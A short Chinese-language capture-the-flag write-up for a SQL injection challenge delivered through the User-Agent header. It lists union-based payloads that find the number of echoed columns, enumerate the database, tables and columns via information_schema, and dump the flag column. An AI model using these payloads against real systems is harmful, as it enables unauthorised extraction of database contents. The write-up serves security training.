原题
解题思路
题目提示是UA注入,那就抓包并对UA头进行处理。猜测应该有两个回显。
-1 union select 1,2
结果确有两个回显。 接下来就是找数据库名、表名、列名、flag字段了。
-1 union select 1,database()
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='rzmkwruvar'
-1 union select 1,group_concat(jshwxxbsyz) from sqli.rzmkwruvar